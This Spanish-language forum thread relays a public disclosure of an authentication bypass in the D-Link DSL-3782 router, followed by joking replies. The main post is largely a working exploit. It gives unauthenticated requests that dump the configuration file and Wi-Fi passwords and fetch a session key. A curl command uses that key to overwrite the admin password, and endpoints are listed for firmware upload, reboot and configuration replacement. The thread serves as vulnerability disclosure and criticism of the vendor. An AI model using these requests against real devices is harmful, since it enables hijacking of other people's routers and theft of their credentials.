El libre pensamiento para un internet libre
No estas registrado.
fuente
D-Link DSL 3782 - Authentication Bypass by Giulio Comi @ packetsorms
El D-Link DSL-3872 es un modelo de doble banda con soporte ac.
No es un modelo de alta gama o de última generación pero tampoco está completamente desfasado.
Wireless AC1200 Dual Band VDSL ADSL Modem Router DSL‑3782
Vamos a ver juntos lo fácil que es saltarse los credenciales para tomar el control del dispositivo
Para obtener todas las contraseñas basta con entrar está petición en la barra del navegador
GET http://192.168.1.1/romfile.cfg
Si lo que buscamos son solo las contraseñas wifi, podemos obtenerlas así:
Red b/g/n;
GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_24.asp
Red ac:
GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_5.asp
Red invitados
GET http://192.168.1.1/cgi-bin/New_GUI/GuestZone.asp
Si queremos modificar la configuración directamente, una llave de sesión es necesaria.
Se obtiene así:
GET http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp
Una vez que tenemos a esta llave podemos emplearla para cambiar la configuración del dispositivo con peticiones POST.
Ejemplos:
Cambiar los credenciales de administrador de acceso a la interfaz web
curl --data "Password=[NEW_PASSWORD_SET_BY_THE_ATTACKER]" \
--data "sessionKey=$(curl -sS http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp)" \
http://192.168.1.1/cgi-bin/New_GUI/Set/Admin.asp
Cambiar las contraseñas wifi
POST http://192.168.1.1/cgi-bin/New_GUI/WiFi_loding.asp
Actualizar firmware
POST http://192.168.1.1/cgi-bin/New_GUI/Set/firmware_upgrade.asp
Forzar reboot
POST http://192.168.1.1/cgi-bin/New_GUI/Set/reboot_wait.asp
Subir una nueva configuración
POST /cgi-bin/New_GUI/Set/config_upgrade.asp
El problema, otra vez, es que D-Link no ha hecho nada tras haber sido advertido.
Otro problema es que la explotar la brecha es de lo más sencillo debido a la pésima programación del firmware.
El router es básicamente incapaz de distinguir las peticiones de un usuario debidamente identificado de las peticiones de un usuario ilegitimo.
Los propietarios de esta "joya" que tienen el acceso remoto habilitado tienen literalmente "el culo al aire"
¡Gracias D-Link!
Desconectado
vaya tela, ya solo le falta abrir la puerta de la cocina y traerte unas
Desconectado
Una lastima que los routers no tengan brazos y patas aún, sino sería posible con una "smart nevera" de estas conectada al PA.
Desconectado
Los propietarios de esta "joya" que tienen el acceso remoto habilitado tienen literalmente "el culo al aire"
¡Gracias D-Link!
Jajajajaja nunca mejor explicado Xd,a quien le gusta estar con el culo al aire,,,,buena información a tener muy en cuenta para los propietarios de dichos routers.
Debes Aprender que puedes hacer Todo bien y aun así fallar.
Desconectado
Tema | Respuestas | Vistas | Ultimo mensaje |
---|---|---|---|
Pegado: |
13 | 4123 | 14-01-2021 18:37:07 por Koala |
Pegado: |
9 | 880 | 13-01-2021 01:37:51 por rizuz |
Crackear un Handshake por AlexHndz
|
2 | 259 | 11-01-2021 17:09:07 por kcdtv |
Pegado: |
487 | 250066 | 11-01-2021 04:03:40 por Bryan Vnzla |
Antena de 2km para la alfa awus036ach por Bryan Vnzla
|
7 | 451 | 10-01-2021 05:08:05 por Bryan Vnzla |
Ultimo usuario registrado: tachuelas
Usuarios registrados conectados: 0
Invitados conectados: 9
Número total de usuarios registrados: 2,084
Número total de temas: 1,491
Número total de mensajes: 14,571
Atom tema feed - Impulsado por FluxBB